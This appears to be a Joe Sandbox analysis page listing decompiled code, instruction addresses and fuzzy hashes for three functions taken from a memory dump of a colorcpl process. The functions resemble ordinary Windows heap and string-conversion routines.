0x043fb183
0x043fb18c
0x00000000
0x00000000
0x043fb192
0x043fb195
0x043fb19e
0x00000000
0x00000000
0x043fb1a7
0x00000000
0x043fb1a7
0x043fb10a
0x043fb102
0x043fb0e4
0x043fb0dd
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
Instruction ID: 7f259c63e119fd906a8a1dd5ce72ee4cd12b06a949aaa42950d5d0aca24c702c
Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
Instruction Fuzzy Hash: 4E71C1B1A4021A9BDB20CF95CC80ABFF7B9AF44784F59511ADE51EB244E734F941C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0437E1A4 Relevance: .2, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0437E1A4(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				signed int _v16;
				char _v36;
				char _v37;
				signed int _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v84;
				char _v92;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t116;
				signed int _t127;
				signed int _t128;
				signed int _t130;
				signed int _t131;
				signed int _t140;
				void* _t148;
				signed int _t158;
				signed int _t159;
				intOrPtr _t161;
				intOrPtr _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t172;
				signed int _t174;
				signed int _t187;

				_t162 = __edx;
				_t150 = __ecx;
				_v8 =  *0x443b370 ^ _t174;
				_t172 = __ecx;
				_v37 = __edx;
				_t148 = 0;
				_v72 = __ecx;
				_v48 = 0;
				_v52 = 0;
				if(( *(__ecx + 0xd4) & 0x04000000) != 0) {
					_t162 =  &_v48;
					_t167 = E04413527(__ecx,  &_v48,  &_v52);
					__eflags = _t167;
					if(_t167 < 0) {
						L16:
						if(_t187 != 0) {
							L27:
							_t148 = E0436ABA0(_t167);
						}
						return E04384B50(_t148, _t148, _v8 ^ _t174, _t162, _t167, _t172);
					}
					 *((intOrPtr*)(__ecx + 0x118)) =  *((intOrPtr*)(__ecx + 0x118)) + _v48;
					 *((intOrPtr*)(__ecx + 0x114)) =  *((intOrPtr*)(__ecx + 0x114)) + _v52;
				}
				_t9 = _t172 + 0x14c; // 0x14c
				if( *_t9 == _t9) {
					_t65 = _t172 + 0x154; // 0x154
					_t114 = _t65;
					__eflags =  *_t65 - _t114;
					if( *_t65 != _t114) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t172 + 0x168)) - _t148;
					if( *((intOrPtr*)(_t172 + 0x168)) != _t148) {
						goto L2;
					}
					__eflags =  *(_t172 + 0xd4) & 0x00001000;
					if(( *(_t172 + 0xd4) & 0x00001000) != 0) {
						goto L2;
					}
					_push(3);
					_push(0x18);
					_push( &_v36);
					_push( &_v92);
					_push( *((intOrPtr*)(_t172 + 0x68)));
					_t167 = E04382E40();
					__eflags = _t167;
					if(_t167 < 0) {
						goto L16;
					}
					_t74 = _v16 + 3; // 0x3
					_t168 = _t74 &  ~_v16;
					L3:
					_v44 = _t168;
					_t116 = E04355D90(_t150,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t168);
					_v56 = _t116;
					if(_t116 == 0) {
						_t167 = 0xc0000017;
						goto L27;
					}
					_push(_t148);
					_v84 = _t148;
					_push( &_v84);
					_push(_t168);
					_push(_t116);
					_v80 = _t148;
					_push( &_v92);
					_push(_t148);
					_push(_t148);
					_push(_t148);
					_push( *((intOrPtr*)(_t172 + 0x68)));
					_t167 = E043829F0();
					if(_t167 < 0) {
						L15:
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t148, _v56);
						_t187 = _t167;
						goto L16;
					}
					_t169 = _v56;
					_t154 = _v44;
					if(_v44 >=  *_t169) {
						_t154 =  *_t169;
						_v44 =  *_t169;
					}
					if(_v37 != _t148) {
						L12:
						 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 4));
						E0437E330( *((intOrPtr*)(_t169 + 4)), _t172, _t169, _v44);
						_t162 = _t169;
						E04380EC6(_t172, _t169, _v44);
						_push(_t148);
						_push( &_v84);
						_push(_v44);
						_push(_t169);
						_push( &_v92);
						_push(_t148);
						_push(_t148);
						_push(_t148);
						_push( *((intOrPtr*)(_t172 + 0x68)));
						_t167 = E04382A10();
						if(_v37 == 0 && _t167 >= 0) {
							_t127 =  *(_t172 + 0xd4);
							if((_t127 & 0x04000020) != 0) {
								__eflags = _t127 & 0x04000000;
								if((_t127 & 0x04000000) == 0) {
									__eflags = _t127 & 0x00002000;
									_t128 =  *(_t172 + 0xd0);
									_t158 = 0x400;
									if((_t127 & 0x00002000) == 0) {
										_t158 = 0x100000;
									}
									_t159 = _t128 * _t158;
									_v48 = _t128 * _t158 >> 0x20;
									_t130 =  *(_t172 + 0x118);
									_t162 = _t130 *  *(_t172 + 0x8c) >> 0x20;
									_t131 = _t130 *  *(_t172 + 0x8c);
									__eflags = _t162 - _v48;
									if(__eflags > 0) {
										goto L15;
									} else {
										if(__eflags < 0) {
											L37:
											_v68 = _t131;
											__eflags = _t131 | _t162;
											_v64 = _t162;
											if((_t131 | _t162) != 0) {
												_push(0x14);
												_push(8);
												_push( &_v68);
												_push( &_v100);
												_push( *((intOrPtr*)(_t172 + 0x68)));
												_t167 = E04382C20();
											}
											goto L15;
										}
										__eflags = _t131 - _t159;
										if(_t131 >= _t159) {
											goto L15;
										}
										goto L37;
									}
								}
								_t131 =  *(_t172 + 0xf8);
								_t162 =  *(_t172 + 0xfc);
								goto L37;
							}
						}
						goto L15;
					}
					 *((intOrPtr*)(_t169 + 0x74)) =  *((intOrPtr*)(_t172 + 0x88));
					 *(_t169 + 0x8c) =  *(_t172 + 0x118);
					 *((intOrPtr*)(_t169 + 0x98)) =  *((intOrPtr*)(_t169 + 0x98)) +  *((intOrPtr*)(_t172 + 0x110));
					 *((intOrPtr*)(_t169 + 0x174)) =  *((intOrPtr*)(_t169 + 0x174)) +  *((intOrPtr*)(_t172 + 0x114));
					_t140 =  *(_t172 + 0xd4);
					if((_t140 & 0x00010000) != 0) {
						__eflags = _t140 & 0x00001000;
						if((_t140 & 0x00001000) != 0) {
							E04412AF0(_t172, _t169, _t154, _v48, _v52);
						}
						goto L12;
					}
					while(1) {
						_t161 =  *0x7ffe0018;
						_t166 =  *0x7FFE0014;
						if(_t161 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t169 = _v56;
					_t148 = 0;
					_t172 = _v72;
					 *((intOrPtr*)(_t169 + 0x78)) = _t166;
					 *((intOrPtr*)(_t169 + 0x7c)) = _t161;
					goto L12;
				}
				L2:
				_t168 =  *(_t172 + 0x8c);
				goto L3;
			}

0x0437e1a4
0x0437e1a4
0x0437e1b3
0x0437e1b8
0x0437e1ba
0x0437e1bd
0x0437e1bf
0x0437e1c3
0x0437e1d0
0x0437e1d3
0x043b8dd3
0x043b8ddb
0x043b8ddd
0x043b8ddf
0x0437e312
0x0437e312
0x043b8e58
0x043b8e5e
0x043b8e5e
0x0437e328
0x0437e328
0x043b8de8
0x043b8df1
0x043b8df1
0x0437e1d9
0x0437e1e1
0x043b8dfc
0x043b8dfc
0x043b8e02
0x043b8e04
0x00000000
0x00000000
0x043b8e0a
0x043b8e10
0x00000000
0x00000000
0x043b8e16
0x043b8e20
0x00000000
0x00000000
0x043b8e26
0x043b8e28
0x043b8e2d
0x043b8e31
0x043b8e32
0x043b8e3a
0x043b8e3c
0x043b8e3e
0x00000000
0x00000000
0x043b8e47
0x043b8e4c
0x0437e1ed
0x0437e1f6
0x0437e1fc
0x0437e201
0x0437e206
0x043b8e53
0x00000000
0x043b8e53
0x0437e20c
0x0437e210
0x0437e213
0x0437e214
0x0437e215
0x0437e219
0x0437e21c
0x0437e21d
0x0437e21e
0x0437e21f
0x0437e220
0x0437e228
0x0437e22c
0x0437e2fe
0x0437e30b
0x0437e310
0x00000000
0x0437e310
0x0437e232
0x0437e235
0x0437e23a
0x0437e23c
0x0437e23e
0x0437e23e
0x0437e244
0x0437e2ab
0x0437e2b5
0x0437e2b8
0x0437e2c0
0x0437e2c4
0x0437e2c9
0x0437e2cd
0x0437e2ce
0x0437e2d4
0x0437e2d5
0x0437e2d6
0x0437e2d7
0x0437e2d8
0x0437e2d9
0x0437e2e5
0x0437e2e7
0x0437e2ed
0x0437e2f8
0x043b8e85
0x043b8e8a
0x043b8ea0
0x043b8ea5
0x043b8ea7
0x043b8eac
0x043b8eae
0x043b8eae
0x043b8eb5
0x043b8eb7
0x043b8eba
0x043b8ec0
0x043b8ec0
0x043b8ec6
0x043b8ec9
0x00000000
0x043b8ecf
0x043b8ecf
0x043b8ed9
0x043b8ed9
0x043b8edc
0x043b8ede
0x043b8ee1
0x043b8ee7
0x043b8ee9
0x043b8eee
0x043b8ef2
0x043b8ef3
0x043b8efb
0x043b8efb
0x00000000
0x043b8ee1
0x043b8ed1
0x043b8ed3
0x00000000
0x00000000
0x00000000
0x043b8ed3
0x043b8ec9
0x043b8e8c
0x043b8e92
0x00000000
0x043b8e92
0x0437e2f8
0x00000000
0x0437e2e7
0x0437e24c
0x0437e255
0x0437e261
0x0437e26d
0x0437e273
0x0437e27e
0x043b8e65
0x043b8e6a
0x043b8e7b
0x043b8e7b
0x00000000
0x043b8e6a
0x0437e28f
0x0437e28f
0x0437e291
0x0437e297
0x00000000
0x00000000
0x0437e329
0x0437e329
0x0437e29d
0x0437e2a0
0x0437e2a2
0x0437e2a5
0x0437e2a8
0x00000000
0x0437e2a8
0x0437e1e7
0x0437e1e7
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3568a592e60bcc2566250f212f339eaa77805fa5388c7668737a3d56a0edb2ea
Instruction ID: 4dc1de8144553406d9223167dbb485672eaa9556c11d37e1661522398b5d6057
Opcode Fuzzy Hash: 3568a592e60bcc2566250f212f339eaa77805fa5388c7668737a3d56a0edb2ea
Instruction Fuzzy Hash: A7815C71A00609EFEB25DFA4C881BEEB7F9FF48354F105469E596A7210EB30B805DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0440970B Relevance: .2, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0440970B(signed int __ecx, signed int __edx, signed int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				char* _t66;
				intOrPtr _t67;
				intOrPtr _t73;
				signed int _t81;
				signed int _t83;
				signed int _t86;
				signed int _t92;
				signed int _t94;
				void* _t95;
				signed int _t100;
				signed int _t107;
				signed int _t119;
				signed int _t121;
				signed int _t122;

				_t108 = __edx;
				_v8 =  *0x443b370 ^ _t122;
				_t120 = _a8;
				_t119 = __ecx;
				_t86 = ( *(__ecx + 0xc) | __edx) & 0x93000f0b;
				if(_a8 <= 0x7fffffff) {
					_t108 = __ecx;
					__eflags = E04408435(__ecx + 0x18);
					if(__eflags == 0) {
						goto L1;
					}
					_t121 = _a4;
					_t108 = _t121;
					_v24 = _t121;
					_t62 = E04409955(__ecx, _t121, __eflags, _t120, _t86,  &_v44);
					__eflags = _t62;
					if(_t62 == 0) {
						L48:
						__eflags = _t121;
						L49:
						return E04384B50(_t121, _t86, _v8 ^ _t122, _t108, _t119, _t121);
					}
					__eflags = _v28 - _a8;
					if(_v28 < _a8) {
						goto L48;
					}
					_t108 = _v44;
					_t64 = 0;
					_v20 = _t108;
					__eflags = _a16;
					if(__eflags == 0) {
						_t92 = _a12;
						__eflags = _t92;
						if(_t92 != 0) {
							 *_t92 = _t108;
						}
						L13:
						__eflags = _t108 - _a8;
						if(_t108 == _a8) {
							L41:
							_t65 = E04353C40();
							__eflags = _t65;
							if(_t65 == 0) {
								_t66 = 0x7ffe0380;
							} else {
								_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							__eflags =  *_t66;
							if( *_t66 != 0) {
								_t67 =  *[fs:0x30];
								__eflags =  *(_t67 + 0x240) & 0x00000001;
								if(( *(_t67 + 0x240) & 0x00000001) != 0) {
									__eflags = _t121;
									if(_t121 != 0) {
										_t108 = _t121;
										E043FF30A(_t119, _t121, _v24, _v44, _v32, 3);
									}
								}
							}
							goto L49;
						}
						_t94 = 0;
						_v16 = 0;
						__eflags = _t86 & 0x01000000;
						if((_t86 & 0x01000000) != 0) {
							L21:
							_t108 = _t86 & 0x12000001 | 0x01000000;
							_v12 = _t86 & 0x12000001 | 0x01000000;
							__eflags = _t121;
							if(__eflags != 0) {
								_t95 = 0;
								__eflags = 0;
								L25:
								__eflags = _t95 - 2;
								if(_t95 != 2) {
									__eflags = (_t95 + 2 << 7) + _t119;
									_t72 = E0440D4C6((_t95 + 2 << 7) + _t119, _t108, _t121,  &_v44);
									L28:
									__eflags = _v16;
									_t121 = _t72;
									if(_v16 == 0) {
										L34:
										__eflags = _t121;
										if(_t121 == 0) {
											goto L49;
										}
										__eflags = _t121 - 0xffffffff;
										if(_t121 == 0xffffffff) {
											goto L49;
										}
										_t73 = _v32;
										__eflags = _t86 & 0x00000002;
										if((_t86 & 0x00000002) != 0) {
											_t100 = _v20;
											__eflags = _t73 - _t100;
											if(_t73 > _t100) {
												__eflags = _t73 - _t100;
												E04388F40(_t100 + _t121, 0, _t73 - _t100);
												_t73 = _v32;
											}
										}
										__eflags = _t86 & 0x10000000;
										if((_t86 & 0x10000000) != 0) {
											 *((intOrPtr*)(_t73 + _t121)) = 0xabababab;
											 *((intOrPtr*)(_t73 + _t121 + 4)) = 0xabababab;
										}
										goto L41;
									}
									__eflags = _t121;
									if(__eflags == 0) {
										L32:
										_t72 = _v24;
										_v12 = _v24;
										L33:
										__eflags = E04408565(_t119, _t72, __eflags, _t86, 0) + 8;
										_t108 = _t119;
										E043E78DE(_v16, _t119, _v12, 6, E04408565(_t119, _t72, __eflags, _t86, 0) + 8);
										goto L34;
									}
									__eflags = _t121 - 0xffffffff;
									if(__eflags == 0) {
										goto L32;
									}
									_v12 = _t121;
									goto L33;
								}
								L26:
								_t108 = _v12;
								_t72 = E0440A6C0(_t119, _v12, _t121,  &_v44);
								goto L28;
							}
							_push(_t94);
							_t81 = E0440DE9F(_t86, 0x4436dc8, (_t121 -  *0x4436dc4 >> 0x14) + (_t121 -  *0x4436dc4 >> 0x14), _t119, _t121, __eflags);
							__eflags = _t81;
							if(_t81 == 0) {
								goto L26;
							} else {
								_t108 = _v12;
								_t26 = _t81 - 1; // -1
								_t95 = _t26;
								goto L25;
							}
						}
						__eflags =  *(_t119 + 0x10);
						if( *(_t119 + 0x10) == 0) {
							goto L21;
						}
						__eflags = _t64;
						if(__eflags != 0) {
							L18:
							__eflags = _t64 - 0xffffffff;
							if(_t64 == 0xffffffff) {
								goto L21;
							}
							_t94 =  *(_t64 + 2) & 0xf;
							__eflags = _t94;
							_v16 = _t94;
							if(_t94 == 0) {
								goto L21;
							}
							_t108 = _t119;
							_t83 = E043E78DE(_t94, _t119, _t121, 5, _t64 + 8);
							__eflags = _t83;
							if(_t83 < 0) {
								goto L48;
							}
							goto L21;
						}
						_t94 = _t119;
						_t64 = E04408565(_t94, _t121, __eflags, _t86, 0);
						__eflags = _t64;
						if(_t64 == 0) {
							goto L21;
						}
						goto L18;
					}
					_t64 = E04408565(_t119, _t121, __eflags, _t86, _a12);
					__eflags = 0;
					if(0 == 0) {
						L9:
						_t107 = 0;
						__eflags = 0;
						L10:
						 *_a16 = _t107;
						_t108 = _v20;
						goto L13;
					}
					__eflags = 0 - 0xffffffff;
					if(0 == 0xffffffff) {
						goto L9;
					} else {
						_t107 =  *0x00000000 & 0x0000ffff;
						goto L10;
					}
				}
				L1:
				_t121 = 0;
				goto L49;
			}

0x0440970b
0x0440971a
0x0440971f
0x04409723
0x0440972a
0x04409736
0x04409742
0x0440974c
0x0440974e
0x00000000
0x00000000
0x04409758
0x0440975b
0x0440975d
0x04409760
0x04409765
0x04409767
0x0440993f
0x0440993f
0x04409942
0x04409952
0x04409952
0x04409770
0x04409773
0x00000000
0x00000000
0x04409779
0x0440977c
0x0440977e
0x04409781
0x04409784
0x044097ae
0x044097b1
0x044097b3
0x044097b5
0x044097b5
0x044097b7
0x044097b7
0x044097ba
0x044098f3
0x044098f3
0x044098f8
0x044098fa
0x0440990c
0x044098fc
0x04409905
0x04409905
0x04409911
0x04409914
0x04409916
0x0440991c
0x04409923
0x04409925
0x04409927
0x0440992e
0x04409938
0x04409938
0x04409927
0x04409923
0x00000000
0x04409914
0x044097c0
0x044097c2
0x044097c5
0x044097cb
0x0440980c
0x04409814
0x0440981a
0x0440981d
0x04409820
0x04409846
0x04409846
0x04409848
0x04409848
0x0440984b
0x04409869
0x0440986b
0x04409870
0x04409870
0x04409874
0x04409876
0x044098ab
0x044098ab
0x044098ad
0x00000000
0x00000000
0x044098b3
0x044098b6
0x00000000
0x00000000
0x044098bc
0x044098bf
0x044098c2
0x044098c4
0x044098c7
0x044098c9
0x044098cb
0x044098d4
0x044098d9
0x044098dc
0x044098c9
0x044098df
0x044098e5
0x044098ec
0x044098ef
0x044098ef
0x00000000
0x044098e5
0x04409878
0x0440987a
0x04409886
0x04409886
0x04409889
0x0440988c
0x0440989b
0x044098a4
0x044098a6
0x00000000
0x044098a6
0x0440987c
0x0440987f
0x00000000
0x00000000
0x04409881
0x00000000
0x04409881
0x0440984d
0x0440984d
0x04409857
0x00000000
0x04409857
0x0440982d
0x04409835
0x0440983a
0x0440983c
0x00000000
0x0440983e
0x0440983e
0x04409841
0x04409841
0x00000000
0x04409841
0x0440983c
0x044097cd
0x044097d0
0x00000000
0x00000000
0x044097d2
0x044097d4
0x044097e5
0x044097e5
0x044097e8
0x00000000
0x00000000
0x044097ee
0x044097ee
0x044097f1
0x044097f4
0x00000000
0x00000000
0x044097f9
0x044097ff
0x04409804
0x04409806
0x00000000
0x00000000
0x00000000
0x04409806
0x044097da
0x044097dc
0x044097e1
0x044097e3
0x00000000
0x00000000
0x00000000
0x044097e3
0x0440978e
0x04409793
0x04409795
0x044097a1
0x044097a1
0x044097a1
0x044097a3
0x044097a6
0x044097a9
0x00000000
0x044097a9
0x04409797
0x0440979a
0x00000000
0x0440979c
0x0440979c
0x00000000
0x0440979c
0x0440979a
0x04409738
0x04409738
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2cdeec9c4ff5f05c3c2e6a0573294552c2ddb4d0c847e928bc4dba46b6d2099
Instruction ID: 67463969c525379ed27c185eaa905eb591631ff3495e6bde13dda0e886b58f06
Opcode Fuzzy Hash: b2cdeec9c4ff5f05c3c2e6a0573294552c2ddb4d0c847e928bc4dba46b6d2099
Instruction Fuzzy Hash: 4D61A4B2B115159BDF259F65C840BBF77AAAF84314F14C13BE851973C2DB34E9218B60

Uniqueness

Uniqueness Score: -1.00%

Function 0435C560 Relevance: .2, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0435C560(signed short* _a4, signed short* _a8, char _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* _v29;
				signed int _v36;
				unsigned int _v40;
				intOrPtr _v44;
				signed short _v48;
				signed char* _v52;
				signed int _v56;
				signed short _v60;
				signed int _v64;
				unsigned int _v68;
				signed short _v72;
				intOrPtr _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				intOrPtr _t78;
				signed short _t79;
				signed short _t81;
				signed char _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t93;
				signed int _t96;
				signed int _t98;
				signed short* _t100;
				signed char* _t102;
				signed char* _t103;
				signed int _t104;
				signed int _t105;
				signed short _t106;
				signed short _t112;
				intOrPtr _t113;
				void* _t119;
				char _t120;
				signed int _t121;
				unsigned int _t122;
				unsigned int _t124;
				signed char* _t126;
				signed short* _t128;
				signed short _t129;
				signed int _t133;
				signed int _t135;
				intOrPtr _t137;
				signed int _t138;
				void* _t142;
				void* _t148;

				_push(0xfffffffe);
				_push(0x441c248);
				_push(E0438AD20);
				_push( *[fs:0x0]);
				_t73 =  *0x443b370;
				_v12 = _v12 ^ _t73;
				_push(_t73 ^ _t138);
				 *[fs:0x0] =  &_v20;
				_t100 = _a8;
				_t133 =  *_t100 & 0x0000ffff;
				_t126 = _t100[2];
				_t104 = 0;
				_t120 =  *0x4433921; // 0x0
				_v29 = _t120;
				if(_t120 != 0) {
					if(_t133 != 0) {
						L0436D210(0, 0,  &_v36, _t126, _t133);
						_t105 = _v36;
						L4:
						_t106 = _t105 + 2;
						if(_t106 > 0xfffe) {
							_t78 = 0xc00000f0;
							L17:
							 *[fs:0x0] = _v20;
							return _t78;
						}
						_t121 = _t106 & 0x0000ffff;
						_t9 = _t121 - 2; // 0x3fffffe
						_t79 = _t9;
						_t128 = _a4;
						 *_t128 = _t79;
						if(_a12 != 0) {
							_t128[1] = _t121;
							_t81 = E04355D90(_t106,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t106);
							_t128[2] = _t81;
							if(_t81 == 0) {
								_t78 = 0xc0000017;
								goto L17;
							}
							_t82 =  *0x4433921; // 0x0
							L9:
							_v44 = 0;
							_v8 = 0;
							_v76 = 1;
							_t135 =  *_t100 & 0x0000ffff;
							_v56 = _t135;
							_t102 = _t100[2];
							_v52 = _t102;
							_t122 =  *_t128 & 0x0000ffff;
							_t129 = _t128[2];
							_v48 = _t129;
							_t83 = _t82 & 0x000000ff;
							if(_t83 != 0) {
								if(_t135 != 0) {
									L0436D210(_t129, _t122,  &_v40, _t102, _t135);
								} else {
									_v40 = _t135;
								}
								L16:
								_v44 = 0;
								 *((short*)(_a4[2] + (_v40 >> 1) * 2)) = 0;
								_v44 = 0;
								_v8 = 0xfffffffe;
								_v76 = 0;
								E0435C6DB(_a4[2], _a4, 0);
								_t78 = 0;
								goto L17;
							}
							_t124 = _t122 >> 1;
							_v68 = _t124;
							_t148 =  *0x4436930 - _t83; // 0x0
							if(_t148 != 0) {
								_v72 = _t129;
								while(_t124 != 0 && _t135 != 0) {
									_t124 = _t124 - 1;
									_v68 = _t124;
									_t135 = _t135 - 1;
									_v56 = _t135;
									_t89 =  *_t102 & 0x000000ff;
									_v36 =  *(0x4434b00 + _t89 * 2) & 0x0000ffff;
									_t56 = _t129 + 2; // 0x438ad22
									_t112 = _t56;
									_v60 = _t112;
									if(_v36 == 0) {
										_t113 =  *0x4436920; // 0x7fa9001c
										_t90 =  *((intOrPtr*)(_t113 + _t89 * 2));
										_t102 =  &(_t102[1]);
										L44:
										 *_t129 = _t90;
										_t129 = _v60;
										_v52 = _t102;
										_v48 = _t129;
										continue;
									}
									if(_t135 != 0) {
										_t103 =  &(_t102[1]);
										_v52 = _t103;
										_t93 =  *0x4436928; // 0x0
										_t90 =  *((intOrPtr*)(_t93 + (( *_t103 & 0x000000ff) + (_v36 & 0x0000ffff)) * 2));
										_t102 =  &(_t103[1]);
										_t135 = _t135 - 1;
										_v56 = _t135;
										goto L44;
									}
									 *_t129 = 0;
									_t129 = _t112;
									_v48 = _t129;
									break;
								}
								_v40 = _t129 - _v72;
								goto L16;
							}
							if(_t124 >= _t135) {
								_t124 = _t135;
							}
							_v40 = _t124 + _t124;
							_t137 =  *0x4436920; // 0x7fa9001c
							_t96 = 0;
							while(1) {
								_v64 = _t96;
								if(_t96 >= _t124) {
									goto L16;
								}
								 *((short*)(_t129 + _t96 * 2)) =  *((intOrPtr*)(_t137 + (_t102[_t96] & 0x000000ff) * 2));
								_t96 = _t96 + 1;
							}
							goto L16;
						}
						_t119 = (_t79 & 0x0000ffff) + 2;
						if(_t119 > (_t128[1] & 0x0000ffff) || _t119 < 2) {
							_t78 = 0x80000005;
							goto L17;
						} else {
							_t82 = _v29;
							goto L9;
						}
					}
					_t105 = 0;
					L3:
					_v36 = _t105;
					goto L4;
				}
				_t142 =  *0x4436930 - _t104; // 0x0
				if(_t142 != 0) {
					if(_t133 == 0) {
						goto L3;
					} else {
						goto L25;
					}
					do {
						L25:
						_t133 = _t133 - 1;
						_t98 =  *_t126 & 0x000000ff;
						_t126 =  &(_t126[1]);
						if( *((short*)(0x4434b00 + _t98 * 2)) == 0) {
							goto L28;
						}
						if(_t133 == 0) {
							_t105 = _t104 + 2;
							goto L3;
						}
						_t133 = _t133 - 1;
						_t126 =  &(_t126[1]);
						L28:
						_t104 = _t104 + 2;
					} while (_t133 != 0);
					goto L3;
				}
				_t105 = _t133 + _t133;
				goto L3;
			}

0x0435c565
0x0435c567
0x0435c56c
0x0435c577
0x0435c57e
0x0435c583
0x0435c588
0x0435c58c
0x0435c592
0x0435c595
0x0435c598
0x0435c59b
0x0435c59d
0x0435c5a3
0x0435c5a8
0x043a8b39
0x043a8b4c
0x043a8b51
0x0435c5c0
0x0435c5c0
0x0435c5c9
0x043a8b8b
0x0435c6a1
0x0435c6a4
0x0435c6b2
0x0435c6b2
0x0435c5cf
0x0435c5d2
0x0435c5d2
0x0435c5d5
0x0435c5d8
0x0435c5df
0x0435c6b5
0x0435c6c5
0x0435c6ca
0x0435c6cf
0x0435c6ee
0x00000000
0x0435c6ee
0x0435c6d1
0x0435c603
0x0435c603
0x0435c60a
0x0435c611
0x0435c618
0x0435c61b
0x0435c61e
0x0435c621
0x0435c624
0x0435c627
0x0435c62a
0x0435c62d
0x0435c632
0x043a8b97
0x043a8ba9
0x043a8b99
0x043a8b99
0x043a8b99
0x0435c673
0x0435c673
0x0435c687
0x0435c68d
0x0435c690
0x0435c697
0x0435c69a
0x0435c69f
0x00000000
0x0435c69f
0x0435c638
0x0435c63a
0x0435c63d
0x0435c643
0x043a8bb3
0x043a8bb6
0x043a8bbe
0x043a8bbf
0x043a8bc2
0x043a8bc3
0x043a8bc6
0x043a8bd1
0x043a8bd4
0x043a8bd4
0x043a8bd7
0x043a8bdf
0x043a8c1b
0x043a8c21
0x043a8c25
0x043a8c26
0x043a8c26
0x043a8c29
0x043a8c2c
0x043a8c2f
0x00000000
0x043a8c2f
0x043a8be3
0x043a8c02
0x043a8c03
0x043a8c0b
0x043a8c10
0x043a8c14
0x043a8c15
0x043a8c16
0x00000000
0x043a8c16
0x043a8be7
0x043a8bea
0x043a8bec
0x00000000
0x043a8bec
0x043a8bf5
0x00000000
0x043a8bf5
0x0435c64b
0x0435c64d
0x0435c64d
0x0435c652
0x0435c655
0x0435c65b
0x0435c65d
0x0435c65d
0x0435c662
0x00000000
0x00000000
0x0435c66c
0x0435c670
0x0435c670
0x00000000
0x0435c65d
0x0435c5e8
0x0435c5f1
0x043a8c5d
0x00000000
0x0435c600
0x0435c600
0x00000000
0x0435c600
0x0435c5f1
0x043a8b3b
0x0435c5bd
0x0435c5bd
0x00000000
0x0435c5bd
0x0435c5ae
0x0435c5b4
0x043a8b5b
0x00000000
0x00000000
0x00000000
0x00000000
0x043a8b61
0x043a8b61
0x043a8b61
0x043a8b62
0x043a8b65
0x043a8b6f
0x00000000
0x00000000
0x043a8b73
0x043a8b83
0x00000000
0x043a8b83
0x043a8b75
0x043a8b76
0x043a8b77
0x043a8b77
0x043a8b7a
0x00000000
0x043a8b7e
0x0435c5ba
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d3852664dececcfa1f65eae39d4dc1ca7e986e0877370020f0d5def532f8b0
Instruction ID: aba35c14c732e51ecbcfad057be4297c16e07a47f67405d7ef22fb90fb338d12
Opcode Fuzzy Hash: 91d3852664dececcfa1f65eae39d4dc1ca7e986e0877370020f0d5def532f8b0
Instruction Fuzzy Hash: A571E1B0D05625DFDB29DF59C890BBEBBB4FF48704F14611AE842A7360E334A914CBA0

Uniqueness

Uniqueness Score: -1.00%

